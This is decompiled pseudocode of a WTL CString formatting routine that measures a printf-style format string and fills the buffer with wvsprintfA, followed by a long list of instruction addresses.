                                                                                                                                                                                                                                                                                          				intOrPtr _t186;
                                                                                                                                                                                                                                                                                          				CHAR** _t188;
                                                                                                                                                                                                                                                                                          				long* _t189;
                                                                                                                                                                                                                                                                                          				CHAR* _t191;
                                                                                                                                                                                                                                                                                          				LONG* _t192;
                                                                                                                                                                                                                                                                                          				LONG* _t193;
                                                                                                                                                                                                                                                                                          				void* _t195;
                                                                                                                                                                                                                                                                                          				void* _t212;
                                                                                                                                                                                                                                                                                          				void* _t213;
                                                                                                                                                                                                                                                                                          				void* _t216;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t191 = _a8;
                                                                                                                                                                                                                                                                                          				_v20 = _a12;
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				while( *_t191 != 0) {
                                                                                                                                                                                                                                                                                          					if( *_t191 != 0x25) {
                                                                                                                                                                                                                                                                                          						L82:
                                                                                                                                                                                                                                                                                          						_t111 = CharNextA(_t191);
                                                                                                                                                                                                                                                                                          						_t63 =  &_v8;
                                                                                                                                                                                                                                                                                          						 *_t63 = _v8 + _t111 - _t191;
                                                                                                                                                                                                                                                                                          						__eflags =  *_t63;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t191 = CharNextA(_t191);
                                                                                                                                                                                                                                                                                          						_t115 =  *_t191;
                                                                                                                                                                                                                                                                                          						if(_t115 == 0x25) {
                                                                                                                                                                                                                                                                                          							goto L82;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t189 = 0;
                                                                                                                                                                                                                                                                                          							_v12 = 0;
                                                                                                                                                                                                                                                                                          							if(_t115 == 0) {
                                                                                                                                                                                                                                                                                          								L15:
                                                                                                                                                                                                                                                                                          								_push(_t191);
                                                                                                                                                                                                                                                                                          								_v12 = E001060F2();
                                                                                                                                                                                                                                                                                          								_t117 =  *_t191;
                                                                                                                                                                                                                                                                                          								_t195 = _t195 + 4;
                                                                                                                                                                                                                                                                                          								if( *_t191 != 0) {
                                                                                                                                                                                                                                                                                          									while(1) {
                                                                                                                                                                                                                                                                                          										_t153 = E001063BE(_t117);
                                                                                                                                                                                                                                                                                          										_t195 = _t195 + 4;
                                                                                                                                                                                                                                                                                          										if(_t153 == 0) {
                                                                                                                                                                                                                                                                                          											goto L18;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										_t191 = CharNextA(_t191);
                                                                                                                                                                                                                                                                                          										_t117 =  *_t191;
                                                                                                                                                                                                                                                                                          										if( *_t191 != 0) {
                                                                                                                                                                                                                                                                                          											continue;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										goto L18;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								do {
                                                                                                                                                                                                                                                                                          									if(_t115 != 0x23) {
                                                                                                                                                                                                                                                                                          										__eflags = _t115 - 0x2a;
                                                                                                                                                                                                                                                                                          										if(_t115 != 0x2a) {
                                                                                                                                                                                                                                                                                          											__eflags = _t115 - 0x2d;
                                                                                                                                                                                                                                                                                          											if(_t115 == 0x2d) {
                                                                                                                                                                                                                                                                                          												goto L13;
                                                                                                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                                                                                                          												__eflags = _t115 - 0x2b;
                                                                                                                                                                                                                                                                                          												if(_t115 == 0x2b) {
                                                                                                                                                                                                                                                                                          													goto L13;
                                                                                                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                                                                                                          													__eflags = _t115 - 0x30;
                                                                                                                                                                                                                                                                                          													if(_t115 == 0x30) {
                                                                                                                                                                                                                                                                                          														goto L13;
                                                                                                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                                                                                                          														__eflags = _t115 - 0x20;
                                                                                                                                                                                                                                                                                          														if(_t115 == 0x20) {
                                                                                                                                                                                                                                                                                          															goto L13;
                                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											_t156 = _a12;
                                                                                                                                                                                                                                                                                          											_a12 = _t156 + 4;
                                                                                                                                                                                                                                                                                          											_v12 =  *_t156;
                                                                                                                                                                                                                                                                                          											goto L13;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										_v8 = _v8 + 2;
                                                                                                                                                                                                                                                                                          										goto L13;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									break;
                                                                                                                                                                                                                                                                                          									L13:
                                                                                                                                                                                                                                                                                          									_t191 = CharNextA(_t191);
                                                                                                                                                                                                                                                                                          									_t115 =  *_t191;
                                                                                                                                                                                                                                                                                          								} while (_t115 != 0);
                                                                                                                                                                                                                                                                                          								if(_v12 == _t189) {
                                                                                                                                                                                                                                                                                          									goto L15;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							L18:
                                                                                                                                                                                                                                                                                          							_v16 = _t189;
                                                                                                                                                                                                                                                                                          							if( *_t191 == 0x2e) {
                                                                                                                                                                                                                                                                                          								_t191 = CharNextA(_t191);
                                                                                                                                                                                                                                                                                          								_push(_t191);
                                                                                                                                                                                                                                                                                          								if( *_t191 != 0x2a) {
                                                                                                                                                                                                                                                                                          									_v16 = E001060F2();
                                                                                                                                                                                                                                                                                          									_t146 =  *_t191;
                                                                                                                                                                                                                                                                                          									_t195 = _t195 + 4;
                                                                                                                                                                                                                                                                                          									__eflags = _t146;
                                                                                                                                                                                                                                                                                          									if(_t146 != 0) {
                                                                                                                                                                                                                                                                                          										while(1) {
                                                                                                                                                                                                                                                                                          											_t147 = E001063BE(_t146);
                                                                                                                                                                                                                                                                                          											_t195 = _t195 + 4;
                                                                                                                                                                                                                                                                                          											__eflags = _t147;
                                                                                                                                                                                                                                                                                          											if(_t147 == 0) {
                                                                                                                                                                                                                                                                                          												goto L24;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          											_t191 = CharNextA(_t191);
                                                                                                                                                                                                                                                                                          											_t146 =  *_t191;
                                                                                                                                                                                                                                                                                          											__eflags = _t146;
                                                                                                                                                                                                                                                                                          											if(_t146 != 0) {
                                                                                                                                                                                                                                                                                          												continue;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          											goto L24;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t150 = _a12 + 4;
                                                                                                                                                                                                                                                                                          									_a12 = _t150;
                                                                                                                                                                                                                                                                                          									_v16 =  *((intOrPtr*)(_t150 - 4));
                                                                                                                                                                                                                                                                                          									_t191 = CharNextA(??);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							L24:
                                                                                                                                                                                                                                                                                          							_t118 =  *_t191;
                                                                                                                                                                                                                                                                                          							_t160 = 0;
                                                                                                                                                                                                                                                                                          							if(_t118 != 0x49 || _t191[1] != 0x36 || _t191[2] != 0x34) {
                                                                                                                                                                                                                                                                                          								_t120 = _t118 + 0xffffffba;
                                                                                                                                                                                                                                                                                          								__eflags = _t120 - 0x26;
                                                                                                                                                                                                                                                                                          								if(_t120 <= 0x26) {
                                                                                                                                                                                                                                                                                          									_t21 = _t120 + 0xf5d3c; // 0x8b04c483
                                                                                                                                                                                                                                                                                          									switch( *((intOrPtr*)(( *_t21 & 0x000000ff) * 4 +  &M000F5D2C))) {
                                                                                                                                                                                                                                                                                          										case 0:
                                                                                                                                                                                                                                                                                          											L32:
                                                                                                                                                                                                                                                                                          											_t191 = CharNextA(_t191);
                                                                                                                                                                                                                                                                                          											goto L33;
                                                                                                                                                                                                                                                                                          										case 1:
                                                                                                                                                                                                                                                                                          											_t160 = 0x10000;
                                                                                                                                                                                                                                                                                          											goto L32;
                                                                                                                                                                                                                                                                                          										case 2:
                                                                                                                                                                                                                                                                                          											__ebx = 0x20000;
                                                                                                                                                                                                                                                                                          											goto L32;
                                                                                                                                                                                                                                                                                          										case 3:
                                                                                                                                                                                                                                                                                          											goto L33;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_t191 =  &(_t191[3]);
                                                                                                                                                                                                                                                                                          								_t160 = 0x40000;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							L33:
                                                                                                                                                                                                                                                                                          							_t122 =  *_t191 | _t160;
                                                                                                                                                                                                                                                                                          							_t212 = _t122 - 0x10063;
                                                                                                                                                                                                                                                                                          							if(_t212 > 0) {
                                                                                                                                                                                                                                                                                          								__eflags = _t122 - 0x20053;
                                                                                                                                                                                                                                                                                          								if(__eflags > 0) {
                                                                                                                                                                                                                                                                                          									_t123 = _t122 - 0x20063;
                                                                                                                                                                                                                                                                                          									__eflags = _t123;
                                                                                                                                                                                                                                                                                          									if(_t123 == 0) {
                                                                                                                                                                                                                                                                                          										goto L50;
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										__eflags = _t123 != 0x10;
                                                                                                                                                                                                                                                                                          										if(_t123 != 0x10) {
                                                                                                                                                                                                                                                                                          											goto L41;
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											goto L63;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									if(__eflags == 0) {
                                                                                                                                                                                                                                                                                          										L63:
                                                                                                                                                                                                                                                                                          										_t136 = _a12 + 4;
                                                                                                                                                                                                                                                                                          										_a12 = _t136;
                                                                                                                                                                                                                                                                                          										_t137 =  *(_t136 - 4);
                                                                                                                                                                                                                                                                                          										__eflags = _t137;
                                                                                                                                                                                                                                                                                          										if(_t137 != 0) {
                                                                                                                                                                                                                                                                                          											_t42 =  &(_t137[0]); // 0x2
                                                                                                                                                                                                                                                                                          											_t183 = _t42;
                                                                                                                                                                                                                                                                                          											do {
                                                                                                                                                                                                                                                                                          												_t171 =  *_t137;
                                                                                                                                                                                                                                                                                          												_t137 =  &(_t137[0]);
                                                                                                                                                                                                                                                                                          												__eflags = _t171;
                                                                                                                                                                                                                                                                                          											} while (_t171 != 0);
                                                                                                                                                                                                                                                                                          											goto L47;
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											_t41 =  &(_t137[1]); // 0x6
                                                                                                                                                                                                                                                                                          											_t189 = _t41;
                                                                                                                                                                                                                                                                                          											goto L69;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										__eflags = _t122 - 0x10073;
                                                                                                                                                                                                                                                                                          										if(_t122 == 0x10073) {
                                                                                                                                                                                                                                                                                          											goto L51;
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											__eflags = _t122 - 0x20043;
                                                                                                                                                                                                                                                                                          											goto L40;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								if(_t212 == 0) {
                                                                                                                                                                                                                                                                                          									L50:
                                                                                                                                                                                                                                                                                          									_a12 = _a12 + 4;
                                                                                                                                                                                                                                                                                          									_t189 = 2;
                                                                                                                                                                                                                                                                                          									goto L69;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t213 = _t122 - 0x73;
                                                                                                                                                                                                                                                                                          									if(_t213 > 0) {
                                                                                                                                                                                                                                                                                          										_t141 = _t122 - 0x10043;
                                                                                                                                                                                                                                                                                          										__eflags = _t141;
                                                                                                                                                                                                                                                                                          										if(_t141 == 0) {
                                                                                                                                                                                                                                                                                          											goto L50;
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											__eflags = _t141 == 0x10;
                                                                                                                                                                                                                                                                                          											if(_t141 == 0x10) {
                                                                                                                                                                                                                                                                                          												goto L51;
                                                                                                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                                                                                                          												goto L41;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										if(_t213 == 0) {
                                                                                                                                                                                                                                                                                          											L51:
                                                                                                                                                                                                                                                                                          											_t139 = _a12 + 4;
                                                                                                                                                                                                                                                                                          											_a12 = _t139;
                                                                                                                                                                                                                                                                                          											_t140 =  *(_t139 - 4);
                                                                                                                                                                                                                                                                                          											__eflags = _t140;
                                                                                                                                                                                                                                                                                          											if(_t140 != 0) {
                                                                                                                                                                                                                                                                                          												_t134 = lstrlenA(_t140);
                                                                                                                                                                                                                                                                                          												goto L48;
                                                                                                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                                                                                                          												_t37 =  &(_t140[6]); // 0x6
                                                                                                                                                                                                                                                                                          												_t189 = _t37;
                                                                                                                                                                                                                                                                                          												goto L69;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											if(_t122 == 0x43) {
                                                                                                                                                                                                                                                                                          												goto L50;
                                                                                                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                                                                                                          												if(_t122 == 0x53) {
                                                                                                                                                                                                                                                                                          													_t131 = _a12 + 4;
                                                                                                                                                                                                                                                                                          													_a12 = _t131;
                                                                                                                                                                                                                                                                                          													_t132 =  *((intOrPtr*)(_t131 - 4));
                                                                                                                                                                                                                                                                                          													if(_t132 != 0) {
                                                                                                                                                                                                                                                                                          														_t31 = _t132 + 2; // 0x2
                                                                                                                                                                                                                                                                                          														_t183 = _t31;
                                                                                                                                                                                                                                                                                          														do {
                                                                                                                                                                                                                                                                                          															_t170 =  *_t132;
                                                                                                                                                                                                                                                                                          															_t132 = _t132 + 2;
                                                                                                                                                                                                                                                                                          															__eflags = _t170;
                                                                                                                                                                                                                                                                                          														} while (_t170 != 0);
                                                                                                                                                                                                                                                                                          														L47:
                                                                                                                                                                                                                                                                                          														_t133 = _t132 - _t183;
                                                                                                                                                                                                                                                                                          														__eflags = _t133;
                                                                                                                                                                                                                                                                                          														_t134 = _t133 >> 1;
                                                                                                                                                                                                                                                                                          														L48:
                                                                                                                                                                                                                                                                                          														_t189 = _t134;
                                                                                                                                                                                                                                                                                          														__eflags = _t189 - 1;
                                                                                                                                                                                                                                                                                          														if(_t189 >= 1) {
                                                                                                                                                                                                                                                                                          															__eflags = _t189;
                                                                                                                                                                                                                                                                                          															if(_t189 == 0) {
                                                                                                                                                                                                                                                                                          																goto L41;
                                                                                                                                                                                                                                                                                          															} else {
                                                                                                                                                                                                                                                                                          																goto L69;
                                                                                                                                                                                                                                                                                          															}
                                                                                                                                                                                                                                                                                          														} else {
                                                                                                                                                                                                                                                                                          															_t189 = 1;
                                                                                                                                                                                                                                                                                          															goto L69;
                                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                                                                                                          														_t30 = _t132 + 6; // 0x6
                                                                                                                                                                                                                                                                                          														_t189 = _t30;
                                                                                                                                                                                                                                                                                          														L69:
                                                                                                                                                                                                                                                                                          														_t124 = _v12;
                                                                                                                                                                                                                                                                                          														if(_t189 <= _t124) {
                                                                                                                                                                                                                                                                                          															_t189 = _t124;
                                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                                          														_t125 = _v16;
                                                                                                                                                                                                                                                                                          														if(_t125 == 0 || _t189 < _t125) {
                                                                                                                                                                                                                                                                                          															goto L81;
                                                                                                                                                                                                                                                                                          														} else {
                                                                                                                                                                                                                                                                                          															_v8 = _v8 + _t125;
                                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                                                                                                          													_t216 = _t122 - 0x63;
                                                                                                                                                                                                                                                                                          													L40:
                                                                                                                                                                                                                                                                                          													if(_t216 == 0) {
                                                                                                                                                                                                                                                                                          														goto L50;
                                                                                                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                                                                                                          														L41:
                                                                                                                                                                                                                                                                                          														_t128 =  *_t191 + 0xffffffbb;
                                                                                                                                                                                                                                                                                          														if(_t128 > 0x33) {
                                                                                                                                                                                                                                                                                          															L81:
                                                                                                                                                                                                                                                                                          															_v8 = _v8 + _t189;
                                                                                                                                                                                                                                                                                          														} else {
                                                                                                                                                                                                                                                                                          															_t24 = _t128 + 0xf5d78; // 0xff5608eb
                                                                                                                                                                                                                                                                                          															switch( *((intOrPtr*)(( *_t24 & 0x000000ff) * 4 +  &M000F5D64))) {
                                                                                                                                                                                                                                                                                          																case 0:
                                                                                                                                                                                                                                                                                          																	OutputDebugStringA("Floating point (%%e, %%f, %%g, and %%G) is not supported by the WTL::CString class.");
                                                                                                                                                                                                                                                                                          																	DebugBreak();
                                                                                                                                                                                                                                                                                          																	_v8 = _v8 + __edi;
                                                                                                                                                                                                                                                                                          																	__ebx = CharNextA;
                                                                                                                                                                                                                                                                                          																	goto L83;
                                                                                                                                                                                                                                                                                          																case 1:
                                                                                                                                                                                                                                                                                          																	__eflags = __ebx & 0x00040000;
                                                                                                                                                                                                                                                                                          																	if((__ebx & 0x00040000) == 0) {
                                                                                                                                                                                                                                                                                          																		goto L76;
                                                                                                                                                                                                                                                                                          																	} else {
                                                                                                                                                                                                                                                                                          																		_a12 = _a12 + 8;
                                                                                                                                                                                                                                                                                          																	}
                                                                                                                                                                                                                                                                                          																	goto L77;
                                                                                                                                                                                                                                                                                          																case 2:
                                                                                                                                                                                                                                                                                          																	_t59 =  &_a12;
                                                                                                                                                                                                                                                                                          																	 *_t59 = _a12 + 4;
                                                                                                                                                                                                                                                                                          																	__eflags =  *_t59;
                                                                                                                                                                                                                                                                                          																	goto L81;
                                                                                                                                                                                                                                                                                          																case 3:
                                                                                                                                                                                                                                                                                          																	L76:
                                                                                                                                                                                                                                                                                          																	_t51 =  &_a12;
                                                                                                                                                                                                                                                                                          																	 *_t51 = _a12 + 4;
                                                                                                                                                                                                                                                                                          																	__eflags =  *_t51;
                                                                                                                                                                                                                                                                                          																	L77:
                                                                                                                                                                                                                                                                                          																	__eax = _v16;
                                                                                                                                                                                                                                                                                          																	__eax = _v16 + _v12;
                                                                                                                                                                                                                                                                                          																	__edi = 0x20;
                                                                                                                                                                                                                                                                                          																	__eflags = __eax - 0x20;
                                                                                                                                                                                                                                                                                          																	if(__eax < 0x20) {
                                                                                                                                                                                                                                                                                          																		goto L81;
                                                                                                                                                                                                                                                                                          																	} else {
                                                                                                                                                                                                                                                                                          																		__ebx = CharNextA;
                                                                                                                                                                                                                                                                                          																		__edi = __eax;
                                                                                                                                                                                                                                                                                          																		_v8 = _v8 + __edi;
                                                                                                                                                                                                                                                                                          																	}
                                                                                                                                                                                                                                                                                          																	goto L83;
                                                                                                                                                                                                                                                                                          																case 4:
                                                                                                                                                                                                                                                                                          																	goto L81;
                                                                                                                                                                                                                                                                                          															}
                                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					L83:
                                                                                                                                                                                                                                                                                          					_t191 = CharNextA(_t191);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t174 = _a4;
                                                                                                                                                                                                                                                                                          				_t88 =  *_a4;
                                                                                                                                                                                                                                                                                          				_t186 = _v8;
                                                                                                                                                                                                                                                                                          				_t68 = _t88 - 0xc; // -12
                                                                                                                                                                                                                                                                                          				_t192 = _t68;
                                                                                                                                                                                                                                                                                          				if( *(_t88 - 0xc) > 1 || _t186 >  *((intOrPtr*)(_t88 - 4))) {
                                                                                                                                                                                                                                                                                          					_t158 =  *((intOrPtr*)(_t88 - 8));
                                                                                                                                                                                                                                                                                          					if(_v8 < _t158) {
                                                                                                                                                                                                                                                                                          						_t186 = _t158;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(E000F5E70(_t174) == 0) {
                                                                                                                                                                                                                                                                                          						goto L95;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t91 = _t158 + 1;
                                                                                                                                                                                                                                                                                          						if(_t186 + 1 >= _t158 + 1) {
                                                                                                                                                                                                                                                                                          							_t74 =  &(_t192[3]); // 0xd
                                                                                                                                                                                                                                                                                          							E001096A0( *_a4, _t74, _t91);
                                                                                                                                                                                                                                                                                          							_t195 = _t195 + 0xc;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)( *_a4 - 8)) = _t158;
                                                                                                                                                                                                                                                                                          						if(_t192 != 0x15ad20 && InterlockedDecrement(_t192) <= 0) {
                                                                                                                                                                                                                                                                                          							_push(_t192);
                                                                                                                                                                                                                                                                                          							E001062C2();
                                                                                                                                                                                                                                                                                          							_t195 = _t195 + 4;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						goto L94;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					L94:
                                                                                                                                                                                                                                                                                          					_t188 = _a4;
                                                                                                                                                                                                                                                                                          					_t93 =  *_t188;
                                                                                                                                                                                                                                                                                          					if(_t93 != 0) {
                                                                                                                                                                                                                                                                                          						wvsprintfA(_t93, _a8, _v20);
                                                                                                                                                                                                                                                                                          						_t95 =  *_t188;
                                                                                                                                                                                                                                                                                          						__eflags =  *(_t95 - 0xc) - 1;
                                                                                                                                                                                                                                                                                          						_t81 = _t95 - 0xc; // -12
                                                                                                                                                                                                                                                                                          						_t193 = _t81;
                                                                                                                                                                                                                                                                                          						if( *(_t95 - 0xc) > 1) {
                                                                                                                                                                                                                                                                                          							__eflags =  &(_t95[0xfffffffffffffff4]) - 0x15ad20;
                                                                                                                                                                                                                                                                                          							if( &(_t95[0xfffffffffffffff4]) != 0x15ad20) {
                                                                                                                                                                                                                                                                                          								_t104 = InterlockedDecrement(_t193);
                                                                                                                                                                                                                                                                                          								__eflags = _t104;
                                                                                                                                                                                                                                                                                          								if(_t104 <= 0) {
                                                                                                                                                                                                                                                                                          									_t181 =  *_t188 - 0xc;
                                                                                                                                                                                                                                                                                          									__eflags = _t181;
                                                                                                                                                                                                                                                                                          									_push(_t181);
                                                                                                                                                                                                                                                                                          									E001062C2();
                                                                                                                                                                                                                                                                                          									_t195 = _t195 + 4;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_t105 =  *0x15ad30; // 0x15ad2c
                                                                                                                                                                                                                                                                                          								 *_t188 = _t105;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t100 = E000F5E70(_t188);
                                                                                                                                                                                                                                                                                          							__eflags = _t100;
                                                                                                                                                                                                                                                                                          							if(_t100 != 0) {
                                                                                                                                                                                                                                                                                          								_t168 =  *_t188;
                                                                                                                                                                                                                                                                                          								_t102 = 1 + _t193[1];
                                                                                                                                                                                                                                                                                          								__eflags =  *((intOrPtr*)(_t168 - 4)) + 1 - _t102;
                                                                                                                                                                                                                                                                                          								if( *((intOrPtr*)(_t168 - 4)) + 1 >= _t102) {
                                                                                                                                                                                                                                                                                          									__eflags =  &(_t193[3]);
                                                                                                                                                                                                                                                                                          									E001096A0(_t168,  &(_t193[3]), _t102);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t97 = lstrlenA( *_t188);
                                                                                                                                                                                                                                                                                          						 *( *_t188 - 8) = _t97;
                                                                                                                                                                                                                                                                                          						( *_t188)[_t97] = 0;
                                                                                                                                                                                                                                                                                          						return 1;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						L95:
                                                                                                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}























































                                                                                                                                                                                                                                                                                          0x000f591b
                                                                                                                                                                                                                                                                                          0x000f5922
                                                                                                                                                                                                                                                                                          0x000f5925
                                                                                                                                                                                                                                                                                          0x000f592c
                                                                                                                                                                                                                                                                                          0x000f5943
                                                                                                                                                                                                                                                                                          0x000f5c05
                                                                                                                                                                                                                                                                                          0x000f5c06
                                                                                                                                                                                                                                                                                          0x000f5c0a
                                                                                                                                                                                                                                                                                          0x000f5c0a
                                                                                                                                                                                                                                                                                          0x000f5c0a
                                                                                                                                                                                                                                                                                          0x000f5949
                                                                                                                                                                                                                                                                                          0x000f594c
                                                                                                                                                                                                                                                                                          0x000f594e
                                                                                                                                                                                                                                                                                          0x000f5952
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f5958
                                                                                                                                                                                                                                                                                          0x000f5958
                                                                                                                                                                                                                                                                                          0x000f595a
                                                                                                                                                                                                                                                                                          0x000f595f
                                                                                                                                                                                                                                                                                          0x000f599f
                                                                                                                                                                                                                                                                                          0x000f599f
                                                                                                                                                                                                                                                                                          0x000f59a5
                                                                                                                                                                                                                                                                                          0x000f59a8
                                                                                                                                                                                                                                                                                          0x000f59aa
                                                                                                                                                                                                                                                                                          0x000f59af
                                                                                                                                                                                                                                                                                          0x000f59b1
                                                                                                                                                                                                                                                                                          0x000f59b5
                                                                                                                                                                                                                                                                                          0x000f59ba
                                                                                                                                                                                                                                                                                          0x000f59bf
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f59c4
                                                                                                                                                                                                                                                                                          0x000f59c6
                                                                                                                                                                                                                                                                                          0x000f59ca
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f59ca
                                                                                                                                                                                                                                                                                          0x000f59b1
                                                                                                                                                                                                                                                                                          0x000f5961
                                                                                                                                                                                                                                                                                          0x000f5961
                                                                                                                                                                                                                                                                                          0x000f5963
                                                                                                                                                                                                                                                                                          0x000f596b
                                                                                                                                                                                                                                                                                          0x000f596d
                                                                                                                                                                                                                                                                                          0x000f597f
                                                                                                                                                                                                                                                                                          0x000f5981
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f5983
                                                                                                                                                                                                                                                                                          0x000f5983
                                                                                                                                                                                                                                                                                          0x000f5985
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f5987
                                                                                                                                                                                                                                                                                          0x000f5987
                                                                                                                                                                                                                                                                                          0x000f5989
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f598b
                                                                                                                                                                                                                                                                                          0x000f598b
                                                                                                                                                                                                                                                                                          0x000f598d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f598d
                                                                                                                                                                                                                                                                                          0x000f5989
                                                                                                                                                                                                                                                                                          0x000f5985
                                                                                                                                                                                                                                                                                          0x000f596f
                                                                                                                                                                                                                                                                                          0x000f596f
                                                                                                                                                                                                                                                                                          0x000f5977
                                                                                                                                                                                                                                                                                          0x000f597a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f597a
                                                                                                                                                                                                                                                                                          0x000f5965
                                                                                                                                                                                                                                                                                          0x000f5965
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f5965
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f598f
                                                                                                                                                                                                                                                                                          0x000f5992
                                                                                                                                                                                                                                                                                          0x000f5994
                                                                                                                                                                                                                                                                                          0x000f5996
                                                                                                                                                                                                                                                                                          0x000f599d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f599d
                                                                                                                                                                                                                                                                                          0x000f59cc
                                                                                                                                                                                                                                                                                          0x000f59cf
                                                                                                                                                                                                                                                                                          0x000f59d2
                                                                                                                                                                                                                                                                                          0x000f59d7
                                                                                                                                                                                                                                                                                          0x000f59dc
                                                                                                                                                                                                                                                                                          0x000f59dd
                                                                                                                                                                                                                                                                                          0x000f59f9
                                                                                                                                                                                                                                                                                          0x000f59fc
                                                                                                                                                                                                                                                                                          0x000f59fe
                                                                                                                                                                                                                                                                                          0x000f5a01
                                                                                                                                                                                                                                                                                          0x000f5a03
                                                                                                                                                                                                                                                                                          0x000f5a05
                                                                                                                                                                                                                                                                                          0x000f5a09
                                                                                                                                                                                                                                                                                          0x000f5a0e
